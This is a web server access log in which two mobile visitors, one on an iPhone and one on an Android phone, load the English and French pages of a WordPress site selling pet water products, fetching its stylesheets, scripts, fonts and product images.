172.249.167.236 - - [22/Mar/2021:08:54:23 +0800] "GET /wordpress/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.woff2?5.9.1 HTTP/1.1" 200 84384 "https://www.mydogh2o.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 14_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Mobile/15E148 Safari/604.1"
172.249.167.236 - - [22/Mar/2021:08:54:23 +0800] "GET /wordpress/wp-content/plugins/elementor/assets/lib/font-awesome/fonts/fontawesome-webfont.woff2?v=4.7.0 HTTP/1.1" 200 77160 "https://www.mydogh2o.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 14_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Mobile/15E148 Safari/604.1"
172.249.167.236 - - [22/Mar/2021:08:54:24 +0800] "GET /wordpress/wp-content/uploads/2018/09/header-left.png HTTP/1.1" 200 134458 "https://www.mydogh2o.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 14_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Mobile/15E148 Safari/604.1"
172.249.167.236 - - [22/Mar/2021:08:54:24 +0800] "GET /wordpress/wp-content/uploads/2018/09/dental_block1.png HTTP/1.1" 200 80540 "https://www.mydogh2o.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 14_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Mobile/15E148 Safari/604.1"
172.249.167.236 - - [22/Mar/2021:08:54:25 +0800] "GET /wordpress/wp-content/uploads/2018/09/F_-3.png HTTP/1.1" 200 56413 "https://www.mydogh2o.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 14_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Mobile/15E148 Safari/604.1"
172.249.167.236 - - [22/Mar/2021:08:54:25 +0800] "GET /wordpress/wp-content/uploads/2018/09/F_8.png HTTP/1.1" 200 68640 "https://www.mydogh2o.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 14_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Mobile/15E148 Safari/604.1"
172.249.167.236 - - [22/Mar/2021:08:54:24 +0800] "GET /wordpress/wp-content/uploads/2018/08/dogh2o_02.jpg HTTP/1.1" 200 244899 "https://www.mydogh2o.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 14_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Mobile/15E148 Safari/604.1"
172.249.167.236 - - [22/Mar/2021:08:54:25 +0800] "GET /wordpress/wp-content/uploads/2018/09/F_-4.png HTTP/1.1" 200 63208 "https://www.mydogh2o.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 14_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Mobile/15E148 Safari/604.1"
172.249.167.236 - - [22/Mar/2021:08:54:25 +0800] "GET /wordpress/wp-content/uploads/2018/09/F_-2.png HTTP/1.1" 200 43902 "https://www.mydogh2o.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 14_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Mobile/15E148 Safari/604.1"
172.249.167.236 - - [22/Mar/2021:08:54:25 +0800] "GET /wordpress/wp-content/uploads/2018/09/F_-1.png HTTP/1.1" 200 54750 "https://www.mydogh2o.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 14_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Mobile/15E148 Safari/604.1"
172.249.167.236 - - [22/Mar/2021:08:54:25 +0800] "GET /wordpress/wp-content/uploads/2018/09/F_5.png HTTP/1.1" 200 50888 "https://www.mydogh2o.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 14_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Mobile/15E148 Safari/604.1"
172.249.167.236 - - [22/Mar/2021:08:54:25 +0800] "GET /wordpress/wp-content/uploads/2018/09/%E7%94%BB%E6%9D%BF-11-1.png HTTP/1.1" 200 59251 "https://www.mydogh2o.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 14_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Mobile/15E148 Safari/604.1"
172.249.167.236 - - [22/Mar/2021:08:54:26 +0800] "GET /wordpress/wp-content/uploads/2018/09/%E7%94%BB%E6%9D%BF-12.png HTTP/1.1" 200 17715 "https://www.mydogh2o.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 14_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Mobile/15E148 Safari/604.1"
172.249.167.236 - - [22/Mar/2021:08:54:24 +0800] "GET /wordpress/wp-content/uploads/2018/09/COVER-03-03.png HTTP/1.1" 200 573167 "https://www.mydogh2o.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 14_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Mobile/15E148 Safari/604.1"
172.249.167.236 - - [22/Mar/2021:08:54:26 +0800] "GET /wordpress/wp-content/uploads/2018/09/DH015.jpg HTTP/1.1" 200 40771 "https://www.mydogh2o.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 14_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Mobile/15E148 Safari/604.1"
172.249.167.236 - - [22/Mar/2021:08:54:26 +0800] "GET /wordpress/wp-content/uploads/2018/09/DH020.jpg HTTP/1.1" 200 44606 "https://www.mydogh2o.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 14_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Mobile/15E148 Safari/604.1"
172.249.167.236 - - [22/Mar/2021:08:54:26 +0800] "GET /wordpress/wp-content/uploads/2018/09/F_6.png HTTP/1.1" 200 136872 "https://www.mydogh2o.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 14_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Mobile/15E148 Safari/604.1"
172.249.167.236 - - [22/Mar/2021:08:54:26 +0800] "GET /wordpress/wp-content/uploads/2018/09/DH025.jpg HTTP/1.1" 200 35414 "https://www.mydogh2o.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 14_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Mobile/15E148 Safari/604.1"
172.249.167.236 - - [22/Mar/2021:08:54:26 +0800] "GET /wordpress/wp-content/uploads/2018/09/R-015-CH.jpg HTTP/1.1" 200 47702 "https://www.mydogh2o.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 14_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Mobile/15E148 Safari/604.1"
172.249.167.236 - - [22/Mar/2021:08:54:26 +0800] "GET /wordpress/wp-content/uploads/2018/09/R-016-CDH.jpg HTTP/1.1" 200 65546 "https://www.mydogh2o.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 14_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Mobile/15E148 Safari/604.1"
172.249.167.236 - - [22/Mar/2021:08:54:26 +0800] "GET /wordpress/wp-content/uploads/2018/09/R-017.jpg HTTP/1.1" 200 47619 "https://www.mydogh2o.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 14_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Mobile/15E148 Safari/604.1"
172.249.167.236 - - [22/Mar/2021:08:54:26 +0800] "GET /wordpress/wp-content/uploads/2018/09/DH08DC.jpg HTTP/1.1" 200 46134 "https://www.mydogh2o.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 14_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Mobile/15E148 Safari/604.1"
172.249.167.236 - - [22/Mar/2021:08:54:26 +0800] "GET /wordpress/wp-content/uploads/2018/09/CHD001.jpg HTTP/1.1" 200 52707 "https://www.mydogh2o.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 14_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Mobile/15E148 Safari/604.1"
172.249.167.236 - - [22/Mar/2021:08:54:26 +0800] "GET /wordpress/wp-content/uploads/2018/09/AA190A.jpg HTTP/1.1" 200 44924 "https://www.mydogh2o.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 14_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Mobile/15E148 Safari/604.1"
172.249.167.236 - - [22/Mar/2021:08:54:26 +0800] "GET /wordpress/wp-content/uploads/2018/09/%E7%94%BB%E6%9D%BF-13.png HTTP/1.1" 200 25812 "https://www.mydogh2o.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 14_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Mobile/15E148 Safari/604.1"
172.249.167.236 - - [22/Mar/2021:08:54:27 +0800] "GET /wordpress/wp-content/uploads/2019/05/websitelogo.png HTTP/1.1" 200 1453 "https://www.mydogh2o.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 14_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Mobile/15E148 Safari/604.1"
172.249.167.236 - - [22/Mar/2021:08:54:26 +0800] "GET /wordpress/wp-content/uploads/2018/09/V2_pump_cover-04.png HTTP/1.1" 200 124015 "https://www.mydogh2o.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 14_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Mobile/15E148 Safari/604.1"
172.249.167.236 - - [22/Mar/2021:08:54:27 +0800] "GET /wordpress/wp-content/uploads/2018/08/aa_logo.png HTTP/1.1" 200 7228 "https://www.mydogh2o.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 14_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Mobile/15E148 Safari/604.1"
172.249.167.236 - - [22/Mar/2021:08:54:27 +0800] "GET /wordpress/wp-content/uploads/2018/08/KM_LOGO_2.jpg HTTP/1.1" 200 16293 "https://www.mydogh2o.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 14_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Mobile/15E148 Safari/604.1"
172.249.167.236 - - [22/Mar/2021:08:54:27 +0800] "GET /wordpress/wp-content/uploads/2018/03/dogh2o_03.jpg HTTP/1.1" 200 186218 "https://www.mydogh2o.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 14_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Mobile/15E148 Safari/604.1"
172.249.167.236 - - [22/Mar/2021:08:54:27 +0800] "GET /wordpress/wp-content/uploads/2018/09/CatH2O-_r.png HTTP/1.1" 200 13152 "https://www.mydogh2o.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 14_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Mobile/15E148 Safari/604.1"
172.249.167.236 - - [22/Mar/2021:08:54:29 +0800] "GET /favicon.ico HTTP/1.1" 200 697 "https://www.mydogh2o.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 14_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Mobile/15E148 Safari/604.1"
24.114.104.222 - - [22/Mar/2021:08:55:36 +0800] "GET /fr/ HTTP/1.1" 200 16054 "https://www.google.com/" "Mozilla/5.0 (Linux; Android 10; VOG-L04) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Mobile Safari/537.36"
24.114.104.222 - - [22/Mar/2021:08:55:39 +0800] "GET /wordpress/wp-includes/css/dist/block-library/style.min.css?ver=5.0.11 HTTP/1.1" 200 4302 "https://www.mydogh2o.com/fr/" "Mozilla/5.0 (Linux; Android 10; VOG-L04) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Mobile Safari/537.36"
24.114.104.222 - - [22/Mar/2021:08:55:39 +0800] "GET /wordpress/wp-content/themes/vantage/style.css?ver=1.7.9 HTTP/1.1" 200 15006 "https://www.mydogh2o.com/fr/" "Mozilla/5.0 (Linux; Android 10; VOG-L04) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Mobile Safari/537.36"
24.114.104.222 - - [22/Mar/2021:08:55:39 +0800] "GET /wordpress/wp-content/plugins/elementor/assets/lib/font-awesome/css/font-awesome.min.css?ver=4.7.0 HTTP/1.1" 200 7052 "https://www.mydogh2o.com/fr/" "Mozilla/5.0 (Linux; Android 10; VOG-L04) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Mobile Safari/537.36"
24.114.104.222 - - [22/Mar/2021:08:55:40 +0800] "GET /wordpress/wp-content/plugins/elementor/assets/lib/eicons/css/elementor-icons.min.css?ver=5.9.1 HTTP/1.1" 200 3478 "https://www.mydogh2o.com/fr/" "Mozilla/5.0 (Linux; Android 10; VOG-L04) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Mobile Safari/537.36"
24.114.104.222 - - [22/Mar/2021:08:55:40 +0800] "GET /wordpress/wp-content/plugins/elementor/assets/lib/animations/animations.min.css?ver=3.0.13 HTTP/1.1" 200 2592 "https://www.mydogh2o.com/fr/" "Mozilla/5.0 (Linux; Android 10; VOG-L04) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Mobile Safari/537.36"
24.114.104.222 - - [22/Mar/2021:08:55:40 +0800] "GET /wordpress/wp-content/uploads/elementor/css/post-683.css?ver=1604823916 HTTP/1.1" 200 372 "https://www.mydogh2o.com/fr/" "Mozilla/5.0 (Linux; Android 10; VOG-L04) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Mobile Safari/537.36"
24.114.104.222 - - [22/Mar/2021:08:55:40 +0800] "GET /wordpress/wp-content/plugins/elementor/assets/css/frontend-legacy.min.css?ver=3.0.13 HTTP/1.1" 200 536 "https://www.mydogh2o.com/fr/" "Mozilla/5.0 (Linux; Android 10; VOG-L04) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Mobile Safari/537.36"
24.114.104.222 - - [22/Mar/2021:08:55:40 +0800] "GET /wordpress/wp-content/plugins/elementor/assets/css/frontend.min.css?ver=3.0.13 HTTP/1.1" 200 15888 "https://www.mydogh2o.com/fr/" "Mozilla/5.0 (Linux; Android 10; VOG-L04) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Mobile Safari/537.36"
24.114.104.222 - - [22/Mar/2021:08:55:40 +0800] "GET /wordpress/wp-content/uploads/elementor/css/global.css?ver=1604824073 HTTP/1.1" 200 804 "https://www.mydogh2o.com/fr/" "Mozilla/5.0 (Linux; Android 10; VOG-L04) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Mobile Safari/537.36"
24.114.104.222 - - [22/Mar/2021:08:55:40 +0800] "GET /wordpress/wp-content/uploads/elementor/css/post-422.css?ver=1604835802 HTTP/1.1" 200 1090 "https://www.mydogh2o.com/fr/" "Mozilla/5.0 (Linux; Android 10; VOG-L04) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Mobile Safari/537.36"
24.114.104.222 - - [22/Mar/2021:08:55:40 +0800] "GET /wordpress/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1 HTTP/1.1" 200 4014 "https://www.mydogh2o.com/fr/" "Mozilla/5.0 (Linux; Android 10; VOG-L04) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Mobile Safari/537.36"
24.114.104.222 - - [22/Mar/2021:08:55:40 +0800] "GET /wordpress/wp-includes/js/jquery/jquery.js?ver=1.12.4 HTTP/1.1" 200 33776 "https://www.mydogh2o.com/fr/" "Mozilla/5.0 (Linux; Android 10; VOG-L04) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Mobile Safari/537.36"
24.114.104.222 - - [22/Mar/2021:08:55:40 +0800] "GET /wordpress/wp-content/themes/vantage/js/jquery.flexslider.min.js?ver=2.1 HTTP/1.1" 200 6232 "https://www.mydogh2o.com/fr/" "Mozilla/5.0 (Linux; Android 10; VOG-L04) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Mobile Safari/537.36"
24.114.104.222 - - [22/Mar/2021:08:55:40 +0800] "GET /wordpress/wp-content/themes/vantage/js/jquery.theme-main.min.js?ver=1.7.9 HTTP/1.1" 200 2510 "https://www.mydogh2o.com/fr/" "Mozilla/5.0 (Linux; Android 10; VOG-L04) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Mobile Safari/537.36"
24.114.104.222 - - [22/Mar/2021:08:55:40 +0800] "GET /wordpress/wp-content/themes/vantage/js/jquery.touchSwipe.min.js?ver=1.6.6 HTTP/1.1" 200 3672 "https://www.mydogh2o.com/fr/" "Mozilla/5.0 (Linux; Android 10; VOG-L04) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Mobile Safari/537.36"
24.114.104.222 - - [22/Mar/2021:08:55:40 +0800] "GET /wordpress/wp-content/themes/vantage/js/jquery.fitvids.min.js?ver=1.0 HTTP/1.1" 200 797 "https://www.mydogh2o.com/fr/" "Mozilla/5.0 (Linux; Android 10; VOG-L04) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Mobile Safari/537.36"
24.114.104.222 - - [22/Mar/2021:08:55:40 +0800] "GET /wordpress/wp-includes/js/wp-embed.min.js?ver=5.0.11 HTTP/1.1" 200 753 "https://www.mydogh2o.com/fr/" "Mozilla/5.0 (Linux; Android 10; VOG-L04) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Mobile Safari/537.36"
24.114.104.222 - - [22/Mar/2021:08:55:41 +0800] "GET /wordpress/wp-content/plugins/elementor/assets/js/frontend-modules.min.js?ver=3.0.13 HTTP/1.1" 200 18275 "https://www.mydogh2o.com/fr/" "Mozilla/5.0 (Linux; Android 10; VOG-L04) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Mobile Safari/537.36"
24.114.104.222 - - [22/Mar/2021:08:55:41 +0800] "GET /wordpress/wp-includes/js/jquery/ui/position.min.js?ver=1.11.4 HTTP/1.1" 200 2562 "https://www.mydogh2o.com/fr/" "Mozilla/5.0 (Linux; Android 10; VOG-L04) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Mobile Safari/537.36"
24.114.104.222 - - [22/Mar/2021:08:55:41 +0800] "GET /wordpress/wp-content/plugins/elementor/assets/lib/dialog/dialog.min.js?ver=4.8.1 HTTP/1.1" 200 3510 "https://www.mydogh2o.com/fr/" "Mozilla/5.0 (Linux; Android 10; VOG-L04) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Mobile Safari/537.36"
24.114.104.222 - - [22/Mar/2021:08:55:41 +0800] "GET /wordpress/wp-content/plugins/elementor/assets/lib/waypoints/waypoints.min.js?ver=4.0.2 HTTP/1.1" 200 2993 "https://www.mydogh2o.com/fr/" "Mozilla/5.0 (Linux; Android 10; VOG-L04) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Mobile Safari/537.36"
24.114.104.222 - - [22/Mar/2021:08:55:41 +0800] "GET /wordpress/wp-content/plugins/elementor/assets/lib/share-link/share-link.min.js?ver=3.0.13 HTTP/1.1" 200 1099 "https://www.mydogh2o.com/fr/" "Mozilla/5.0 (Linux; Android 10; VOG-L04) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Mobile Safari/537.36"
24.114.104.222 - - [22/Mar/2021:08:55:41 +0800] "GET /wordpress/wp-content/plugins/elementor/assets/lib/swiper/swiper.min.js?ver=5.3.6 HTTP/1.1" 200 35491 "https://www.mydogh2o.com/fr/" "Mozilla/5.0 (Linux; Android 10; VOG-L04) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Mobile Safari/537.36"
24.114.104.222 - - [22/Mar/2021:08:55:41 +0800] "GET /wordpress/wp-content/themes/vantage/icons/vantage-icons.woff HTTP/1.1" 200 1380 "https://www.mydogh2o.com/wordpress/wp-content/themes/vantage/style.css?ver=1.7.9" "Mozilla/5.0 (Linux; Android 10; VOG-L04) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Mobile Safari/537.36"
24.114.104.222 - - [22/Mar/2021:08:55:41 +0800] "GET /wordpress/wp-content/plugins/elementor/assets/lib/font-awesome/fonts/fontawesome-webfont.woff2?v=4.7.0 HTTP/1.1" 200 77160 "https://www.mydogh2o.com/wordpress/wp-content/plugins/elementor/assets/lib/font-awesome/css/font-awesome.min.css?ver=4.7.0" "Mozilla/5.0 (Linux; Android 10; VOG-L04) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Mobile Safari/537.36"
24.114.104.222 - - [22/Mar/2021:08:55:41 +0800] "GET /wordpress/wp-content/plugins/elementor/assets/js/frontend.min.js?ver=3.0.13 HTTP/1.1" 200 31698 "https://www.mydogh2o.com/fr/" "Mozilla/5.0 (Linux; Android 10; VOG-L04) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Mobile Safari/537.36"
24.114.104.222 - - [22/Mar/2021:08:55:41 +0800] "GET /wordpress/wp-content/uploads/2018/09/header-left.png HTTP/1.1" 200 134458 "https://www.mydogh2o.com/fr/" "Mozilla/5.0 (Linux; Android 10; VOG-L04) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Mobile Safari/537.36"
24.114.104.222 - - [22/Mar/2021:08:55:41 +0800] "GET /wordpress/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.woff2?5.9.1 HTTP/1.1" 200 84384 "https://www.mydogh2o.com/wordpress/wp-content/plugins/elementor/assets/lib/eicons/css/elementor-icons.min.css?ver=5.9.1" "Mozilla/5.0 (Linux; Android 10; VOG-L04) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Mobile Safari/537.36"
24.114.104.222 - - [22/Mar/2021:08:55:42 +0800] "GET /wordpress/wp-content/uploads/2018/10/DC_DH020-French.jpg HTTP/1.1" 200 144397 "https://www.mydogh2o.com/fr/" "Mozilla/5.0 (Linux; Android 10; VOG-L04) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Mobile Safari/537.36"
24.114.104.222 - - [22/Mar/2021:08:55:42 +0800] "GET /wordpress/wp-content/uploads/2018/09/F_-3.png HTTP/1.1" 200 56413 "https://www.mydogh2o.com/fr/" "Mozilla/5.0 (Linux; Android 10; VOG-L04) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Mobile Safari/537.36"
24.114.104.222 - - [22/Mar/2021:08:55:42 +0800] "GET /wordpress/wp-content/uploads/2018/09/F_8.png HTTP/1.1" 200 68640 "https://www.mydogh2o.com/fr/" "Mozilla/5.0 (Linux; Android 10; VOG-L04) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Mobile Safari/537.36"
24.114.104.222 - - [22/Mar/2021:08:55:42 +0800] "GET /wordpress/wp-content/uploads/2018/09/F_-2.png HTTP/1.1" 200 43902 "https://www.mydogh2o.com/fr/" "Mozilla/5.0 (Linux; Android 10; VOG-L04) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Mobile Safari/537.36"
24.114.104.222 - - [22/Mar/2021:08:55:42 +0800] "GET /wordpress/wp-content/uploads/2018/09/F_-4.png HTTP/1.1" 200 63208 "https://www.mydogh2o.com/fr/" "Mozilla/5.0 (Linux; Android 10; VOG-L04) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Mobile Safari/537.36"
24.114.104.222 - - [22/Mar/2021:08:55:41 +0800] "GET /wordpress/wp-content/uploads/2018/08/dogh2o_02.jpg HTTP/1.1" 200 244899 "https://www.mydogh2o.com/fr/" "Mozilla/5.0 (Linux; Android 10; VOG-L04) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Mobile Safari/537.36"
24.114.104.222 - - [22/Mar/2021:08:55:42 +0800] "GET /wordpress/wp-content/uploads/2018/09/F_-1.png HTTP/1.1" 200 54750 "https://www.mydogh2o.com/fr/" "Mozilla/5.0 (Linux; Android 10; VOG-L04) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Mobile Safari/537.36"
24.114.104.222 - - [22/Mar/2021:08:55:42 +0800] "GET /wordpress/wp-content/uploads/2018/09/F_5.png HTTP/1.1" 200 50888 "https://www.mydogh2o.com/fr/" "Mozilla/5.0 (Linux; Android 10; VOG-L04) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Mobile Safari/537.36"
24.114.104.222 - - [22/Mar/2021:08:55:42 +0800] "GET /wordpress/wp-content/uploads/2018/09/%E7%94%BB%E6%9D%BF-11-1.png HTTP/1.1" 200 59251 "https://www.mydogh2o.com/fr/" "Mozilla/5.0 (Linux; Android 10; VOG-L04) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Mobile Safari/537.36"
24.114.104.222 - - [22/Mar/2021:08:55:42 +0800] "GET /wordpress/wp-content/uploads/2018/09/%E7%94%BB%E6%9D%BF-12.png HTTP/1.1" 200 17715 "https://www.mydogh2o.com/fr/" "Mozilla/5.0 (Linux; Android 10; VOG-L04) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Mobile Safari/537.36"
24.114.104.222 - - [22/Mar/2021:08:55:43 +0800] "GET /wordpress/wp-content/uploads/2018/09/DH015.jpg HTTP/1.1" 200 40771 "https://www.mydogh2o.com/fr/" "Mozilla/5.0 (Linux; Android 10; VOG-L04) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Mobile Safari/537.36"
24.114.104.222 - - [22/Mar/2021:08:55:43 +0800] "GET /wordpress/wp-content/uploads/2018/09/DH020.jpg HTTP/1.1" 200 44606 "https://www.mydogh2o.com/fr/" "Mozilla/5.0 (Linux; Android 10; VOG-L04) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Mobile Safari/537.36"
24.114.104.222 - - [22/Mar/2021:08:55:43 +0800] "GET /wordpress/wp-content/uploads/2018/09/DH025.jpg HTTP/1.1" 200 35414 "https://www.mydogh2o.com/fr/" "Mozilla/5.0 (Linux; Android 10; VOG-L04) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Mobile Safari/537.36"
24.114.104.222 - - [22/Mar/2021:08:55:43 +0800] "GET /wordpress/wp-includes/js/wp-emoji-release.min.js?ver=5.0.11 HTTP/1.1" 200 4382 "https://www.mydogh2o.com/fr/" "Mozilla/5.0 (Linux; Android 10; VOG-L04) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Mobile Safari/537.36"
24.114.104.222 - - [22/Mar/2021:08:55:42 +0800] "GET /wordpress/wp-content/uploads/2018/09/F_6.png HTTP/1.1" 200 136872 "https://www.mydogh2o.com/fr/" "Mozilla/5.0 (Linux; Android 10; VOG-L04) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Mobile Safari/537.36"
24.114.104.222 - - [22/Mar/2021:08:55:43 +0800] "GET /wordpress/wp-content/uploads/2018/09/R-015-CH.jpg HTTP/1.1" 200 47702 "https://www.mydogh2o.com/fr/" "Mozilla/5.0 (Linux; Android 10; VOG-L04) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Mobile Safari/537.36"
24.114.104.222 - - [22/Mar/2021:08:55:43 +0800] "GET /wordpress/wp-content/uploads/2018/09/R-016-CDH.jpg HTTP/1.1" 200 65546 "https://www.mydogh2o.com/fr/" "Mozilla/5.0 (Linux; Android 10; VOG-L04) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Mobile Safari/537.36"
24.114.104.222 - - [22/Mar/2021:08:55:43 +0800] "GET /wordpress/wp-content/uploads/2018/09/R-017.jpg HTTP/1.1" 200 47619 "https://www.mydogh2o.com/fr/" "Mozilla/5.0 (Linux; Android 10; VOG-L04) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Mobile Safari/537.36"
24.114.104.222 - - [22/Mar/2021:08:55:43 +0800] "GET /wordpress/wp-content/uploads/2018/09/DH08DC.jpg HTTP/1.1" 200 46134 "https://www.mydogh2o.com/fr/" "Mozilla/5.0 (Linux; Android 10; VOG-L04) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Mobile Safari/537.36"
24.114.104.222 - - [22/Mar/2021:08:55:43 +0800] "GET /wordpress/wp-content/uploads/2018/09/CHD001.jpg HTTP/1.1" 200 52707 "https://www.mydogh2o.com/fr/" "Mozilla/5.0 (Linux; Android 10; VOG-L04) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Mobile Safari/537.36"
